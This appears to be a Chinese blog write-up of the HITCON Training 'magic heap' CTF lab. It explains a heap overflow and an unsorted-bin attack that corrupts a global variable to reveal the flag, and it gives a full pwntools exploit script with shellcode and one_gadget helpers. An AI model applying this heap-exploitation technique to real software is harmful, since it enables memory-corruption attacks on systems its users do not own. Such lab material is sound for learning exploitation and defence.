HITCON Training lab14 magic heap
程序分析
在 IDA 中分析可知，程序只有 create、edit、free 三个功能，其中 edit 功能可以越界写。
程序中存在 system("cat flag") 函数；当把 v3 控制为 4869、同时把 magic 控制为大于 4869 时，就可以得到 flag 了。
利用思路
首先 free 掉一块 0x80 的堆块，使其进入 unsortedbin；之后通过 edit 功能的越界写漏洞，借助 chunk_0 修改已经被 free 掉的 chunk_1，使其 bk 指针指向 magic-0x10 的地址。
最后当我们再次 create 申请一个 0x80 的堆块时，magic 的地址上便会写入 main_arena+88 的地址，而这已经大于 4869 了。
EXP
import os import sys from pwn import * from one_gadget import generate_one_gadget
context.terminal = ["tmux","new-window"]  # gdb.attach() (see debug()) opens in a new tmux window
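def RemPro(ip='',port=''):
    """Set up the target connection and the ``sh``/``elf``/``libc`` globals.

    With more than two command-line arguments the target is ``argv[1]:argv[2]``;
    otherwise ``ip:port`` is tried and, on any failure, the binary is started
    locally with ``process``. ``pro_libc`` is an optional path to the remote
    libc; it is empty here, so ``ELF("")`` fails and the default ``libc_addr``
    is loaded instead. Always returns 1.
    """
    global sh,elf,libc,one_ggs
    elf_addr = "./magic_heap"
    libc_addr = "/lib/x86_64-linux-gnu/libc.so.6"
    pro_libc = ""
    if len(sys.argv) > 2 :
        sh = remote(sys.argv[1],sys.argv[2])
        try:
            libc = ELF(pro_libc)
            libc_addr = pro_libc
        except Exception:  # narrowed from bare `except:` so Ctrl-C / SystemExit still propagate
            log.info("No set Remote_libc...")
            libc = ELF(libc_addr)
    else:
        libc = ELF(libc_addr)
        try:
            sh = remote(ip,port)
            if pro_libc != "":
                libc = ELF(pro_libc)
                libc_addr = pro_libc
        except Exception:  # no reachable remote -> fall back to a local process
            sh = process(elf_addr)
    elf = ELF(elf_addr)
    return 1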
def debug(cmd=""):
    """Attach gdb to the local process, feeding it ``cmd`` as a gdb script.

    Does nothing in remote mode (three or more argv entries), matching the
    argv convention used by ``RemPro``.
    """
    running_locally = len(sys.argv) <= 2
    if not running_locally:
        return
    log.progress("Loading Debug....")
    gdb.attach(sh, cmd)
def shell_code(fw):
    """Return pwntools' stock ``/bin/sh`` shellcode for a 32- or 64-bit target.

    ``fw`` is the word width (32 or 64); any other value yields ``None``.
    """
    builders = {
        32: lambda: shellcraft.sh(),
        64: lambda: shellcraft.amd64.linux.sh(),
    }
    builder = builders.get(fw)
    if builder is None:
        return None
    return asm(builder())
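def one_gadget(libc_addr):
    """Return the one_gadget offsets of the libc at ``libc_addr`` as a list of ints."""
    log.progress("Leak One_Gadgets...")
    return [int(offset) for offset in generate_one_gadget(libc_addr)]


def exp():
    """Carry out the unsorted-bin attack described in 利用思路 and return ``sh``.

    Uses the ``sh`` global set up by ``RemPro()``; the menu strings below are
    the binary's prompts and must stay byte-identical.
    """

    def add(size, content):
        # menu option 1: create a chunk of ``size`` bytes filled with ``content``
        sh.sendlineafter("choice :", "1")
        sh.sendlineafter("Heap : ", str(size))
        sh.sendlineafter("heap:", content)

    def edit(idx, size, content):
        # menu option 2: write ``size`` bytes into chunk ``idx`` (no bounds check, per 程序分析)
        sh.sendlineafter("choice :", "2")
        sh.sendlineafter("Index :", str(idx))
        sh.sendlineafter("Heap : ", str(size))
        sh.sendlineafter("heap : ", content)

    def dele(idx):
        # menu option 3: free chunk ``idx``
        sh.sendlineafter("choice :", "3")
        sh.sendlineafter("Index :", str(idx))

    add(0x20, "a" * 8)  # chunk 0
    add(0x80, "b" * 8)  # chunk 1: the 0x80 chunk that will be freed into the unsorted bin
    add(0x20, "c" * 8)  # chunk 2
    dele(1)
    magic_addr = 0x6020c0  # address of the global ``magic`` in ./magic_heap
    # overflow from chunk 0 into the freed chunk 1 so that its bk points at magic-0x10
    edit(0, 0x20 + 0x20, "a" * 0x20 + p64(0x0) + p64(0x91) + p64(0x123) + p64(magic_addr - 0x10))
    debug()
    # re-allocating the 0x80 chunk writes main_arena+88 into magic (> 4869)
    add(0x80, p64(9999))
    sh.recvuntil("choice :")
    sh.sendline("4869")  # the hidden menu choice that checks magic and prints the flag
    return sh


if __name__ == "__main__":
    RemPro()
    # NOTE: eval() on argv executes an arbitrary expression, not just a function
    # name; kept because this is a local dev shortcut, but a globals() lookup of
    # a known function name would be the safer equivalent.
    # Usage: exp.py [ip port] [func]  -- func defaults to exp().
    if len(sys.argv) > 3:
        eval(sys.argv[3])()
    elif len(sys.argv) == 2:
        eval(sys.argv[1])()
    else:
        exp()
    sh.interactive()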
一眨眼居然2个月没有更新了,生产队的驴都不敢这样歇….惨惨 :-(